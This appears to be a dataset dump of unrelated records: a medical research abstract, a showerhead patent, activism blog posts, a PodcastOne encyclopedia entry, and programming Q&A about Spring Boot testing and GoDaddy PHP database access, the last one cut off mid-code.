text
stringlengths
8
5.77M
The use of antidepressants has been associated with falling in the elderly, a serious problem. The aims of this research are to use a three- dimensional motion analysis system and psychomotor/mood tests to test the hypotheses that amitriptylene more so than desipramine more so than paroxetine affect gait and the propensity to trip and that changes in psychomotor performance or mood are correlated with changes in gait from baseline.
Showerheads are generally threadedly connected to the end of a rigid water conduit showerarm defining an extended water supply pipe above a bathtub or a shower stall wherein water is supplied by manipulation of a faucet or faucets. Usually the showerhead provides ball and socket movement swingable to direct the water spray from the showerhead in a predetermined range of movement within the bathtub or shower stall. This invention is of a showerarm having separate hot and cold water ports and a ball and socket valve and it is characterized by a elongate member which extends downwardly from the valve and out of the direction of the water spray from the showerhead when it is in an open position to a terminal end, which is preferably provided with a ball or other bulbous or enlarged device so as not to injure a person taking a shower. By twisting the rod or rotating the end, the showerarm operator will control so that a valve within it is moved from an valve open position to a valve closed position and additionally vary the water temperature within a range between a hot and cold waterspray. Generally, individual hot and cold water faucets or simple lever-type of faucet is connected to hot and cold water conduits for sources of supply through the supply consuit. The faucet or faucets are manipulated to the proper hot and cold mixture to achieve a desired water temperature for the water flowing through the showerhead. The mixed hot and cold water then enters a single conduit to the showerhead where it passes through a discharge port in the device and is sprayed outwardly upon a user. To adjust the direction of spray, a user must physically grasp any of the single or multiple outlet spray heads, provided in the prior art, and turn it to a desired position. If a user desires to shut off the water supply after he has wetted himself, so that he can "soap-up" or shampoo his or her hair, the faucet or faucets must be turned off and then turned on and readjusted to a desired hot and cold mixture for the rinsing-off operation. Particularly in relatively small bathtub and shower enclosures, generally provided in most bathrooms, it is very difficult to evade the shower spray while soaping-up or shampooing the hair. It will be appreciated that handicapped persons who must sit in the tub but who may also desire the benefits of a shower, find that it is most difficult to do so. This invention provides a downwardly extending operator, which is out of the direction of the spray of the water from the showerhead at all times in use and which may be simply rotated or pivoted to a valve closed position to shut off the water supply by controlling the valve structures to be described hereinafter which are included in the showerarm. It is at once seen that this is highly advantageous, especially to a handicapped person sitting in the bathtub, since the length of the elongate control rod is such that the terminal end is accessible to him while in a sitting position and, by this means, he may control the shower spray direction through a limited range of movement, control the ball and socket valve structure to shut off the water when he so desires and further, control the water temperature. It should be understood that there will be an extremely large savings of the amount of water and hot water energy which is actually used, since a person may simply wet himself down, shut the valve off using the single elongate operator which is conveniently accessible, soap-up, or shampoo his hair, and then turn the valve on readily, without the need for adjusting the temperature of the water. In one embodiment of the instant invention, the device of the present invention provides an extended elongate operator, generally in the form of a rod, extending down from the showerarm having a water temperature control valve structure portion on the upper end with a protective ball or enlarged portion on the extended terminal end fixed in relation to the showerarm ball and socket to permit a user to vary the water spray temperature, shut off the water supply or universally position the showerhead within predetermined limits all by manipulation of the single rod or operator terminal end which is conveniently located out of the path of the water spray. The showerarm socket and ball valve showerhead connection is formed in a manner so as to provide water temperature control means and shut off valving means when it is rotated to a valve closed position or in a first position attitude or range of pivotal movement calculated to direct the water spray into the shower basin, tub, or stall where a person normally will be standing or sitting. The ball and socket connection is formed in a manner so as to provide for swinging movement of the showerhead by manipulation of the rigidly connecting shower rod to a valve closed position closing both the hot and cold water supply ports without upsetting the hot and cold water mixture, and a user need only to push the handle to a movement limit position to shut the water off and to move the showerhead through the easily accessible control rod to a normal in use position to turn the water on. This showerarm invention is designed to supersede the conventional faucet or faucets wherein this device provides the elements and technology necessary to implement the functions provided by conventional faucet or faucets, that is, turn the water on and off and regulate the spray water temperature and additionally the convenience to adjust the water spray direction. The technology provided by this invention also proves to conserve measurable amounts of water and the hot water energy involved and by volume will contribute somewhat toward the progressively worsening energy and water shortages. Therefore, one of the principal objects of the present invention is to provide a showerarm having separate hot and cold water supply ports, a ball and socket valve included having conventional showerhead connection means, operable by rotational movement of a generally outwardly and downwardly extending operator control handle in the form of an elongated extension from the shower arm to position the showerhead to adjust a desired spray direction and to control water flow temperature through the showerarm as illustrated in FIGS. 2, 3, 4 and 5 and to be hereinafter described in detail. Another principal object of this invention is to provide valve means in the showerarm, operable by the handle means, to shut off the valve to control the flow if water through the showerarm so that, when the elongate extending control is pivotally moved into a zone in range of movement a first water flow control valving arrangement is effective to substantially cut off the water by pivotal valve movement; however, it does not completely interrupt a small flow of water at a maximum pivotal valve closed position, so that there is, at all times, a small trickle which is adapted to flow through the device when the second water flow control valve is on, which is well known in the art and, indeed, is required by some plumbing codes. It will be appreciated that compliance with these plumbing codes will in no way interfere with or subtract from the overall concept disclosed herein and claimed of a operator which extends away from the showerarm and a spray of water from the showerhead and which includes a portion which is accessible below the water head for pivotal movement of the ball and socket together with the showerhead to operate a valve means included in the showerarm device to be described for turning on and off the water supply through the showerarm. Another object of the invention is to provide showerarm valve means completely independent of the faucet or faucets controlling the flow of hot and cold water from a source of supply and an operator valve portion therefrom included in the showerarm structure and which in combination is swingable with the extending control rod for operating the first waterflow valve means portion and by rotable movement of the operator control the second waterflow valve means to vary the spray water temperature and effectively completely stop hot and cold water passage through the showerarm. It is also an object of the instant invention to provide an operator which includes, on the terminal end, in the embodiment of an extending rod which is a safety device to protectively cover the extending end of the rod and which is in the form of a ball in the preferred embodiment illustrated. A still further object of the invention, in combination with that described above, is to omit the necessity of conventional faucets, utilize this showerarm invention to control water flow supply and regulate the water temperature by manipulation of a single extending elongate control operator conveniently accessible and to conserve measurable amounts of water and hot water energy. Generally speaking, it is an overall object of this invention to provide a device that is simple and inexpensive to install in new construction which is adapted to provide in a shower or tub environment, a showerarm which includes a extending operator which is at all times out of the direction or path of the spray from the operator and which includes a handle on the terminal end being accessible below the shower for pivotal and rotational movement of the operator to control a valve means within the showerarm effective on the rotational and pivotal movement of the extending operator to open and close the flow of water in a main path through the device, regulate water temperature and adjust the direction of the water spray.
Menu My first post of this project can be found here. It focuses on the spectrum of activism and tries to show why we need different types of activism and how one is not greater than the other. My previous post can be found here, which focus on laying out and defining some tools of activism. By now I hope you can feel that activism isn’t inherently better than others due to prior exposure to its forms. We need many different tactics to blend and stand alone sometimes to allow expression, the passage of knowledge, or pressure a change. I went to a local protest on Earth Day for the global protest March for Science, which was a distributed action due to it being spread across the globe in many instances and clumped on social media to show its widespread support for science to be respected and funded. It was also a direct action as it surrounded one main theme and was set locally around a center area for each community that hosted one. The local direct action ensured that local representatives heard the word of the people while the distributed action of the global March for Science showcased the widespread support of science and how it is not a small problem, it is a global problem. As serious as the dependency on fossil fuels is or the fact Trump denies the majority of the world’s experts in the field, this activism does not have to be depressing, dark, and stern. Other than myself and my friend, I saw many creative ways of protesting mixed with very serious signs and speeches. This slideshow requires JavaScript. There were many great serious speeches and many signs that are the usual “Fight for Science”, “Facts cannot be Ignored”, and many others. But the creative group that showed up is not any less serious. We want to poke fun and enjoy life even when having to fight for a better life. While using already known stories and symbols to criticize stances we cannot support. The picture with the dinosaur is my favorite, as the little girl looks at the dinosaur in curiosity little does she know the dangers of her future. My friend and I sporting Pokemon and Magic the Gathering themes signs are trying to get new understandings of what is happening, we can get angry and protest but if we use our fantasy worlds to understand our real worlds, kids and nerds can better understand the real life story. Whether it be a Pokemon trainer wandering the world with no Pokemon or the people of Kaladesh revolting against the oppressive Consulate to secure a future of innovations and inventions. Kids could imagine a Pokemon game where there are no Pokemon, is that the world they want to live in? They can learn from connections to other worlds they do understand to better understand this one. We need to support creativeness for without it, we are only to ever have stagnation. We need those brave few to organize and ask others for support, those who put themselves in physical danger to fight oppression, and those creative who can nurture knowledge and be outright smart asses. If we want a world that works together, we need activists that work together. In my previous post, I talked about how we need to think about activism as a rainbow spectrum, each color a different way of mobilizing, instead of looking at it through a hierarchical ‘successful’ vs. ‘failure’ idea. For this post, I want to line up some of the possible ways to show how people can make statements, creatively or through pure power, and some examples. Using and citing Andrew Boyd’s Beautiful Trouble: A Toolbox for Revolution. Let’s start with some of the more known tactics, Direct Action and Distributed Action. In my definitions, they do seem to be related or overlap a bit. But more importantly, these seem to be the more known and ‘idealistic’ ways of protest. Direct Action centers around organizing people to showcase opposition or support of an idea or problem through using mobilized people as leverage. They may not have billions of dollars to give to lobbyists or special interests groups, but with large amounts of people taking action, they use this to disrupt power dynamics and try to shift it in their favor. Mainly used to pressure change and showcase resistance or support (p. 32). “Occupy Wall Street March 16 2012” by Michael Fleshman An example of this can go as far back to the Boston Tea Party (p. 32), which was one individual movement to show opposition to Britain. A more modern example is Occupy Wall Street, eventually turning into many direct actions in a distributed action like use, Occupy Wall Street started in New York to oppose the power and constant bailouts the rich banks and companies received despite a surge in foreclosures on American citizens. This is also the style of protest the civil rights movements used during segregation in America. Distributed Action is closely related to direct action, but instead of one major area, it is distributed across the nation, nations, or the entire world. This can heavily rely on social media since it is the fastest way to socialize and organize a distributed movement, also it becomes easy to clump these smaller movements together in the use of hashtags. This can be very beneficial to younger movements that have not had as much grow or support as direct actions, or beneficial to show the diversity and areas the movement does reach out to (p. 36). These can be used to present call out’s for people to enable direct actions (p. 37) or as stated before simply to showcase diversity and support across different areas. This also allows for participants to feel as if they are a part of something bigger, a movement that reaches across many people. These movements are important and are acknowledged for getting needed change in showing the power the people have to pressure change, whether it be legislative change or discussion focus. Now let’s mention other ways of protest and demonstration that tend to be more creative but still effective. These tend to be some of my favorites when it comes to activism, mainly because these use creativeness in ways that distort, alter, and showcase symbols and can be a simple way to leave a big impact. Banner Hang is when a group or person creates a big banner to hang over bridges, buildings, and structures. Can be complex or simple, yet needs to be simple enough to understand and read. The main point is to communicate to the people about a problem or bring into the people’s consciousness an action they should take (p. 12). The most modern example of this is Greenpeace’s Resist banner, here is a link to a news report of the event. Meant to convey and rally resistance to Trump’s denial of climate change and seemingly blatant bigotry. Also, this banner symbolically placed over the white house tried to show the government a portion of the media’s discontent with the new government. Greenpeace has participated in other banner hangs about the Iraqi war and the global nuclear crisis. Greenpeace tagging on a hashtag also participated in the distributed action of #Resist, a nationwide and global social movement to show opposition to the newly elected president and the government as a whole. Electoral Guerilla Theater is a form of extreme satire where someone runs for office, whether it be local, nationally, or both, and develops a character and a platform meant to bring about criticism to other candidates. They do not run to win, in fact, most support a candidate closer to their realistic position and try to not take away votes from others. The act of running and the satirical content of their campaign is meant to point comparisons so the absurdity of other politicians. The best modern example of this is Vermin Supreme. Having his own campaign Facebook and many memes at his disposal he has over the years used his persona Vermin Supreme and his weird platform to criticize mainly right-wing politicians. Supporting the legalization of marijuana is one of his more feasible, progressive views, compared to his mandatory tooth brushing, pony based economy, and using zombies and the latest giant hamster wheel technology for free energy. Known for his viral videos including his Jesus-given revelation to glitter bomb an anti-gay republican candidate to make him gay and his viral speech about his platform (glitter bombing at the end of the video). He does talk about serious issues like dependence on foreign oil and changing over to renewable energy, but does so in with farce. It also forced weird questions like “do you still support your government assisted pledge to give ponies to every American?” to be asked at town hall meetings by people who need to keep a serious tone. But most importantly, gets people to look at other politicians and ask, “well he is not so far from some of these people we find legitimate.” Culture Jamming which is where a group or person takes a well-known cultural artifact or symbol and edits it to alter its known meaning into criticism or shock at another problem or critique. A new meaning that the people should be able to draw conclusions. Originally known as détournement which means “overturning” or “derailment” (p. 28). The best modern example of this is casual pepper spray cop meme of Lt. Pike at the UC Davis protests. This slideshow requires JavaScript. I focused an entire post on this topic before reading Beautiful Trouble, linked here. Taking pictures such as paintings of the declaration of independence, the picture of the monk committing suicide, or the flag raising at Iwo Jima have very heavily emotion responses and meanings to American culture. Adding in a cop pepper spraying and practically assaulting those beloved artifacts creates a whole new meaning. It is no longer brave men raising the flag or a monk committing suicide to protest China, it is now an American cop assaulting and killing the monk and assaulting the men who fought for the island against the Japanese empire. The bigger picture is to then focus on the cop assaulting people he should not which comes back to the original UC Davis protest comparing the innocent and peaceful protestors who got pepper sprayed to the other artifacts who we would already believe did not deserve the abuse of the cop being inserted. It takes a cultural symbol and jams a new meaning and discussion into it. This is my most favorite utility to activism but cannot be done alone and should be combined with other strategies to ensure it takes off (p. 30). But at the same time, I love throwing wrenches into everyday society and send around memes that do it for the mere pleasure. There are many many more examples and tactics but I just wanted to give an overall preview of a few different types. In my next post, I will wrap up and give personal examples of activism I have participated in. We tend to look at social movements and judge them on effectiveness scales. “Did this protest actually help women?” “Did this one actually help science?” “Was there people there who did not really seem serious?” “This is not how it was back in the day, this movement will not get anything done!” I used to look at movements this way too. At one point I lost all hope in Occupy Wall St for the fact a lot of protestors got abused by police and it seemed as if no one ever accomplished anything. It wasn’t until the 2016 election and 2017 class semester I realized I was wrong. A number of times the topic of income inequality and the diminishing “middle class”, which should by now just be summarized as the “working class”, was brought into the attentions of viewers and candidates. It is not so much about instant, success, and change that you should evaluate. Sure Occupy did very little if anything about legislative change, maybe it did spark a few Fight for 15 campaigns, but even that has only changed in a small portion of the nation. But we need to look at the multifaceted influence movements can spread. This also cannot be done through one tried and true method, we need a multitude of strategies to exercise the many ways to spread a movement. First, we need to step back and think about stratification. American culture loves to say how helpful and united we are, yet we push competition and hierarchies that show us otherwise. A social movement that is cited with the remembrance of the lines of workers marching through the police arm locked with their fellow workers who demanded workers’ rights and pressured federal law to pass and give breaks, a shorter work day, and health benefits, we would think as victorious. We would love to think those are the most important compared to movements where their legislative ideas never pass, the movement eventually breaks down, and at its smallest attribute is that it allowed a new discourse to be focused on. We want to rank them vertically on which was “successful” because it is what we have been born into, success and failure, those who made it big and those who did not go far enough in life. We seem to apply it everywhere. I did. The featured picture is a public domain picture I found when searching Creative Commons, and the picture is being used a bit out of context but captures my idea of activism. Originally mainly centered around animal rights movement the rainbow and each color should represent a style of activism. One color does not make a rainbow, but a few distinct colors and shades in between that complete a rainbow. One style and one movement should not and sometimes cannot stand alone. The rest of the picture shows the range of those who hide identity and are known for social chaos, yet they are cuddling bunnies which can show the more nurturing side of activism, to look after one another and help those in need. These people who are both in the cities and towns for civil liberties and worker’s rights, while also being within nature and advocating for animals and environments. Sure those who marched arm in arm may seem like the best way to ensure big change, but even today all their work seems that it was for nothing as once again economic disparity plagues us and worker’s unions seem to constantly be hammered by union busters and fighting for conditions or reasons that by now should not even be a problem. Not saying their work is a failure, but those social movements cannot be inherently more valuable. We need those that focus on education to people of the topic. “Educating them means the problem will go away,” is also not what I am saying, but those who bring problems to the attention of people and try to educate them on the issues and possible solutions; educating the younger population to what the problem is, educating the current young adult and adult population of what the problem is, and the older population, who may not see or understand the problem, show them how and why it is a problem. We need those who can simplify and educate the children, allow them to get to a conclusion they can understand. We need those who are aggressive and literally fight against oppression and wrongdoing. We need those who swarm media and force it to be a topic and exposed to the people. We need those who force their problem and movement to be discussed by media and the governments. We need all movements styles to be respected and supported to its flourishing capacity. I personally got into certain forms of activism due to the idea that what was discussed within ‘institutionalized media’ did not cover the topic well or at all for any reason. I was a big time Occupy supporter because they wanted to change how America talked about wealth disparity (Any Media Necessary, p. 1). The media focused on unemployment and from what I remember more so just what are the unemployment rates. Once Occupy sprang up we started talking more about the hourly wages of millionaire CEO’s and how little their workers get in pay and health coverage. I was young at the time of Occupy, still in High School so not young but inconveniently ‘grounded’ as a minor with no job or car. But what people claim ‘keyboard warrior activism’ is not always so lazy as people want it to seem. After turning 18 I joined the Intactivist community, an organization built on bodily autonomy and not just changing American discourse but want to get law change to ban male genital surgery (circumcision) on minors. Citing cultural bias and scientific inaccuracies they attempt to discuss America myths and cultural ‘unknowingness’ of the natural male body. For example, after turning 18 I joined the Intactivist community, an organization built on bodily autonomy and not just changing American discourse but want to get law change to ban male genital surgery (circumcision) on minors. Citing cultural bias, scientific inaccuracies within America, and bringing into perspective how majority of countries do not do this to their infants, especially some European countries whose health organizations have criticized America for their practice, they want to change how we talk about this seemingly natural thing, which is actually highly unnatural and a human rights issue. Being a ‘keyboard warrior’ actually challenged many of my friend’s ideas. My cousin who had a son contacted me asking questions since he felt weird by the possibility of this topic coming up, eventually, he decided not to do it to his son. Also, many friends contacted me asking me about why/how I feel about it and I facilitated discussion with them. There are two strategies I like to use, not sure if they are original, but I call them’fire start(ers/ing)’ and ‘seed plant(ers/ing)’ “Kiev, Grushevskogo str. 22.01.2014” by Ввласенко Fire starters are what I assume most call rabble rousers. Except these two strategies do not need discourse domination or a ‘successful’ debate win. Simply meant to anger both sides of discourse and take discourse to a new, even more, controversial level. For example, when feminist groups post about female genital mutilation I would be the person to, of course, support what I do believe is solely wrong. But I’d also put statements meant to villainize those who done the same procedure to their sons. Such as “This is disgusting and horrible! What’s worse is most people commenting on this thread probably did the same to their own son! What horrible hypocrites!” It is not meant to dimish female but to push both sides of people, left or right leaning people, to become enraged to show their own hypocritical flaws and cognitive dissonance. I do not care if I “win the keyboard war” it is myself filling up on responses to direct extreme sarcastic reductio ad absurdum. This slightly goes with my next strategy. ‘Seed planting’, I equate this to the success of my friends and especially my cousin reaching out to me about male genital mutilation. Once again, it does not focus on “winning the argument” but instead planting some sort of reasonable doubt that will fester inside those who read my comments. In hopes it makes them requestion their position and either, reach out to the original commenter, research new topics, discuss amongst others (be mini-seed planters). I thouroughly enjoy those who are radical when it comes to discourse. Even when not radicalized I fully support those who forcibly push a culture/society to think about a topic not dicussed or normalized. I was a feminist, at one point. I left the feminist movement around this time of the year back in 2014 (March-April). I did not leave it for any stereotypical reasons one could throw at me. “It wasn’t all about you so you left!” No. “You are a sexist, misogynistic man so you left!” No. “You left because you do not want equality, and can’t stand women having equal ground!” No. But I left because I want to search for equality. Real equality. Feminism turned its ugly side to me and I left because of its own self-destructive ways. Let me direct to a brilliant video that surfaced after the 2016 Election. In case the embedding did not work here is the link. Jonathan hits the nail on a belief I held for so long, a discussion is key. If you limit discussion you just breed more of a difference. Liberals/Feminists feel as if they ‘won the culture war’; anything that is not ‘them’, is wrong and is blasted. Either to silence it or label it in a demonizing way. This is what scared me away from feminism. It was the cultural thinking that this is a strict belief and anything outside of it is sexism. That is not how public media and activism should occur. Clark and Aufderheide in their work A New Vision for Public Media state a viewpoint of John Dewey, “access to participation is to be free and equal, ‘without respect to race, sex, class, or economic status” (MSJ, p.61). I know this tends to help defend those who are marginal. But truthfully this should apply, always. I wanted to participate with the feminist groups and blogs, I supported them, reposted their work, and even to this day I take stands against sexism and inequality. However, my participation was limited, restricted, and sometimes thrown away. I did not go into feminism and try to curse it, nor to make it egoistic about me. I realized it was egoistic. Any time I tried to gather support for men on an issue I was silenced. Even if the issues were the same, I failed to see the equality in ignoring the problem men face simply because it might statistically ‘happen less’ or ‘it is different’ as some feminists would state. At no time, would I ever devalue the suffering of women, every time I showed support for the cause, but asked: “What’s the stance with men and this issue?” Assuming equality was the cornerstone of this movement I was baffled by the clear absence of any male issues that did not pertain to simply boys not being allowed to cry or play with ‘girl toys’. Not saying overbearing masculinity isn’t a problem. If you know me, you would know I’m no manly man. But there was no widespread consensus within the feminist population about men being forced to sign the draft, male bodily autonomy regarding male genital cutting on nonconsenting infants and minors with no scientific bound reason, fathers being alienated from their children by their once partner, and especially courts favoring mothers against fathers. But anytime I brought this up I was called a sexist but I just wanted equal representation that I thought was their cause. I became silenced to the point I was once told: “The mere fact you are a man means your opinions do not matter here!” Of course, this would be dispelled as “just a bad feminist” and I did receive many other female feminists who jumped to my defense. But that did not stop my ban, removal, and silencing within these feminist online groups. Feminism is almost like the Democrats in Johnathan’s video above. They believe they own the culture, they are right, cannot be wrong, and their culture bleeds into the media. Feminism is in many of my readings in the academic field, its trends all over media. It is a strong prevalent movement. People say feminism wants global equality but there is so much ‘us vs them’ within the movement. I understand some skepticism to the Men’s Rights Activists (MRA’s), but this should not destroy any effort at collaborating something better. As Hamelink states that within media we get a strong “us vs. them” narrative, with them always being dangerous to us (MSJ, p.28). And I still support most feminist struggles. Women do have many inequalities which need to be changed. But men do not live a utopian life. This is a founded flaw of feminism I had to walk away from. Women’s issues still do not make it into media as it should, sometimes, but it is still increasingly dominant. But it came to a point where I realized, systemically, my points and suffering or even just the general suffering of men I brought up was being ignored or silenced. This was not equality. Nina Gregg in her work Media Is not the Issue, she states the issue is justice itself. You need to fight to get yourself into the media and you need to be courageous and demanding to get it put out (MSJ, p.86). But that cannot be done if the culture around it belittles and attacks other points that are still within the same spectrum of justice. The Red Pill is a documentary that was conducted by a feminist, at the time, who wanted to get more insight on this seemingly “misogynistic and hateful” movement as she learned within feminism. But I argue, legitimate MRA’s exist because they became marginalized when they needed help. Some of the points these activists fight for I personally know some feminists who do support it. But the movement abroad seems to want nothing with it. Some fight because they are victims of parental alienation, victims of domestic abuse, and many other types. Watch a sneak peek about this here. A sad part of the video is seeing the backlash, from people who could not even stand for 5 minutes to hear what they had to say, referencing the anti-MRA march that showed up shouting instead of listening. In fact, since this documentary has been released its release was canceled in Melbourne, Australia by feminist outrage. People who did not even watch it blasted it and tried to silence its attempt to bring men’s suffering that has gone ignored. What type of message does that bring? Now I will agree there are sexists within the Men’s Rights Movement, but I could show you just as many ‘bad feminists’ I am told to ignore because they ‘are not real feminists’. Margaret Gallagher said in her work Feminism and Social Justice, that one criticism of feminism is that it is achieved at the expense of men. That somehow now they are the victims (MSJ, p.132). Which as a feminist she would believe that this is false, women are the victims and men are privileged. But that’s not the case, they have been victims. In some cases, men are becoming victims more due to ignored statistics and struggles. I left feminism because my ideas of reform to address my own suffering and suffering of men I have met was ignored or struck down. Discussion to them was not a possibility, no matter how I tried in various ways. Therefore, they breed a bigger divide and even created more resistance to their movement. Both want gender issues to be addressed. Christine Dunbar-Hester’s main theme in Drawing and Effacing Boundaries in Contemporary Media Democracy Work is that movements build walls to each other. When there should be a collaboration there is instead frustration and creating even more of a difference on top of the existing difference (MSJ, p 195-197). Both need a reform, not one is perfect. But both has such great amazing points and possible strength. It is the problem that feminism built up its walls and defends them. Any difference is automatically sexism and hate. But how is bringing up the suffering of a man wrong to a movement I was told was for gender equality. We do not need MRA’s to just ‘understand feminism better’ or for feminists to go away. Personally, I would love for both to join together and create its own non-gendered equality movement that does not favor one side. But at least a collaboration of the two to take care of one another’s valid activism and provide each other’s weaknesses with the other’s strengths. Why can’t we just see how the walls are built from inside talk and theory and realize it isn’t the great hero we think it is, we are wrong. Drawing and Effacing Boundaries and Media Democracy in Action were two of the most interesting reads from this book. I enjoyed much more but these two were great. The problem within Dunbar-Hester’s work Drawing and Effacing Boundaries is that we have many different organizations and movements that focus on specific ideas or reforms that they try to push. It is almost evident to find some that are very closely related and advocate within the same realm. However, there may be slight differences but differences matter (MSJ, p. 207). One big problem is that one group may criticize the other groups end goal or worldview which abrupts any reality of univocality within the movements (MSJ, p. 197). This is a bigger problem I will go into in my next post. But this problem creates more frustration towards the groups and in my opinion hinder their mission in the first place. Lastly, Media Democracy in Action by Huff and Phillips. While reading this chapter I felt as if it was myself talking to me. Although I’m not a 9/11 truther, I do agree there is obviously some weird unexplainable things that I wish was mainstream discourse through the media, but it isn’t (MSJ, p.250). Media focusing on trivial garbage such as “Look at (celebrity), they’re so different now!” Well, I would assume that as one ages, they might gain weight and look older, who know right? Why not talk about those who can’t age because they are part of the huge population in poverty and those who starve to death. We claim in America to hold a mighty War on Terror, yet we do not see a modest War on Starvation or poverty within in duty (MSH, p.243-244). American corporate media glosses over stories and limits what we are told. These media push the ‘trusted’ news slogans all over their work but we can’t really trust it if they serve us a buffet of garbage and throw away the most important stories they should be working on (MSJ, p.252). Power struggles are amongst the hardest situation to overcome during activism and social justice. As in my other M&SJ responses, there are other obstacles such as policies, funding, and bridging gaps between reporters either academic or professional and the people needing to be covered. But even when covered the people will still clash with authority, MSM, and companies. In Gallagher’s work, she talks about the Dove “Campaign for Real Beauty”. When this launched I know so many of my feminist friends who supported this and spammed it over Facebook. However, to me, its face value seemed crooked. The women still looked hand picked for pleasurable viewings, feel good activism (fake activism), and money pandering. As Gallagher says they were all under age 30 and still below the average body size for America and Europe (MSJ, p. 134). Now, personally we shouldn’t endorse unhealthy living, but we should stress the idea of people feeling comfortable within their own skin. This was done for profit and for a type of activism I hate which I call ‘feel good activism’ where you personally do not really care about a subject, but you do it because it is for your own good, not the subject’s own good. This shows a power struggle between the people and the companies that do something that seems moral and progressive but are seemingly done for the wrong reasons. It devalues the activism because it takes the seriousness away from a cause. My favorite work in this section was Watching Back written by Mark Andrejevic. Sousvallience, a term I never knew existed, is a hot topic right now. The ability for the people to film and use this as leverage against police who had a monopoly over “the real story” (MSJ, p. 179, 183). After exposing lies under oath and released many from false arrests, the police moved to other ways of securing their authority. This came to as screening of possible protests and confiscating equipment for ‘security’ reasons (MSJ, p. 181-185). This is a constant see-saw of power. First, the police have absolute authority, once questioned and proven wrong there is a period of balance in my eyes, but tipped towards the people. Afterward, they find ways to push the momentum back into their field. One of the things I hated when I was younger was the post 9/11 atmosphere, aside from the anger and warmongering, I am more talking about the idea that security comes at the price of civil liberties (MSJ, p. 186). It’s a sort of taunting, “if you want to be safe you need to submit to x,y,z” which in some cases such as at protests, makes violations from the authority force more realistic than a terroristic attack. Even down to the tactic of trying to induce enough doubt into the situation such as if a videographer has a video of cops interacting with the arrested civilian, the cops could claim “this video does not fully show the whole indecent or from a good perspective.” Attempting to once again gain a monopoly of the true story but through doubtful discourse (MSJ, p. 187). As stated even when people have your back and advocate for a certain subject, there is still some sort of power struggle given as another obstacle which can be one of the worst ones to hurdle over. Using the Watching Back as an overarching theme to power struggles, we all need to have each other’s back and even police those such as companies trying to gain from ‘feel good activism’.
PodcastOne PodcastOne is an advertiser-supported podcast network, founded by Norm Pattiz, also founder of radio-giant Westwood One. , PodcastOne hosted over 200 podcasts, including podcasts from a variety of notable people such as Adam Carolla, Shaquille O'Neal, Stone Cold Steve Austin, Heather Dubrow, Larry King, Jordan Harbinger, PFT Commenter, Vince Russo, Hamish & Andy and Bret Easton Ellis. The PodcastOne studios are based in Beverly Hills, California, with offices across the US, including New York, Chicago and Dallas and an Australian office and studio in Melbourne. History PodcastOne was founded in 2013 by Westwood One founder and owner of Courtside Entertainment, LLC Norm Pattiz. In mid-2015, Hubbard Broadcasting purchased a 30% stake in PodcastOne. Hubbard radio programs are adding podcasts on the network, including WTOP/Washington D.C.'s Target USA. In November, 2015, PodcastOne re-upped with Adam Carolla for 5 years, including the entire Carolla Digital lineup. The deal expanded the partnership to involve production and development of new programming. PodcastOne Premium In March 2016, PodCastOne announced it would be offering premium content subscription services. Shows Carolla Digital shows Barstool Sports shows Tavis Smiley Podcast The Laura Ingraham Show The Steve Austin Show Rob Has A Podcast Jordan Harbinger References External links Category:Companies based in Beverly Hills, California Category:American companies established in 2013 Category:Podcasting companies Category:2013 establishments in California
Q: How to test Java Spring Boot application without @SpringBootApplication using JUnit? I created a Spring Boot Java library which has a set of utilities that perform certain functions. This library can then be used across multiple applications that require its utilities. This library was designed as a Spring Boot application to allow these utilities to be injected in the application context. Now I wish to execute a JUnit test on one of the utilities to ensure it is working correctly. However, since this application is basically a collection of utilities and not a stand-alone application, it does not have a main class or the main method annotated with @SpringBootApplication. Now, when I run the JUnit test, it comes up with an error. java.lang.IllegalStateException: Unable to find a @SpringBootConfiguration, you need to use @ContextConfiguration or @SpringBootTest(classes=...) Is it possible to test this Java library, or should we write the test cases only in the application that will be using this library? A: I think there is some contradiction in what you say: Created a Library...that was designed as a Spring Boot Application. Library can be used across multiple applications that require its utilities. If you implement "1" then there is a module with spring boot maven/gradle plugin configured to create a JAR of the application which is a library. But if you have, say, module X that wishes to use your library, its impossible to add the dependency on your library in this module, spring boot JAR artifacts are not JARs in a Java Sense... So this won't work in both IDE and maven (I mean technically you'll have compilation errors). Then you write something that completely makes sense: You say that the library by itself doesn't have a main class/@SpringBootApplication annotated class. From this I conclude that its not a spring boot application, but rather a spring boot starter module. In this case you should not use @SpringBootTest annotation since it mimics the way of starting up the spring boot application (finds main class, scans the packages according to the package structure, loads the configurations and so forth). You don't need all this. Well, maybe technically you can still create a main class annotated with @SpringBootApplication and put it into src/test/java/.../ in a relevant package, but it doesn't really makes sense. So basically you have two choices: You can test the utilities without spring at all as if the utility is just a Java class, mock the dependency with Mockito and you're good to go. Since these tests are fast, it you be the best option. You can run the integartion test by means of loading the spring context with all the required beans created by the application. @ExtendWith(SpringExtension.class) @ContextConfiguration(classes = {MyLibraryConfiguration.class} public class SampleLibraryTest { @Autowired private SomeBeanFromTheLibrary theBean; @Test public void testFoo() { .... } } Now although you can use component scanning (in this case you'll need slightly different annotations), in the example I've assumed that you're using java config, register all the beans of the library there and create a spring.factories that uses this Java Configuration file to create an autoconfiguration (you add a dependency on the library in module X and it loads the beans defined in the library automatically). This @ExtendsWith (@RunWith for junit 4) has nothing to do with Spring Boot, it behaves as a "plain" spring, you can autowire beans, create mock beans, there is caching of configurations, etc.
Q: GoDaddy: How to add a database to an addon domain I have a main hosting account in goddady eg a.com And I added an addon domain eg b.com I created a database db_a, working with a.com correctly. I created a database db_b, and trying to working with b.com, where can i configure it so that db_b is accessible by b.com as host=localhost? A: After a big while of confusion and debugging, and I found out the reason / solution. But still not sure why Godaddy PDO has this issue. PHP v5.4.45 <?php $pdo = new PDO('mysql:localhost;dbname=mydb', $user, $pass); $sth = $pdo->prepare('select * from tab limit 1'); $sth->execute(); $row = $sth->fetchAll(); echo '<pre>select * from test -- not working -- '; print_r($row); $sth = $pdo->prepare('select now()'); $sth->execute(); $row = $sth->fetchAll(PDO::FETCH_ASSOC); echo "\nselect now -- working -- "; print_r($row); $sth = $pdo->prepare('show databases'); $sth->execute(); $row = $sth->fetchAll(PDO::FETCH_ASSOC); echo "\nshow databases -- working -- "; print_r($row); $sth = $pdo->prepare('show tables'); $sth->execute(); $row = $sth->fetchAll(PDO::FETCH_ASSOC); echo "\nshow tables -- not working -- "; print_r($row); $sth = $pdo->prepare('show privileges'); $sth->execute(); $row = $sth->fetchAll(PDO::FETCH_ASSOC); echo "\nshow privileges -- working but not right -- "; print_r($row); $sth = $pdo->prepare('select * from information_schema.TABLES where TABLE_SCHEMA != \'information_schema\''); $sth->execute(); $row = $sth->fetchAll(PDO::FETCH_ASSOC); echo "\nselect * from information_schema.TABLES -- 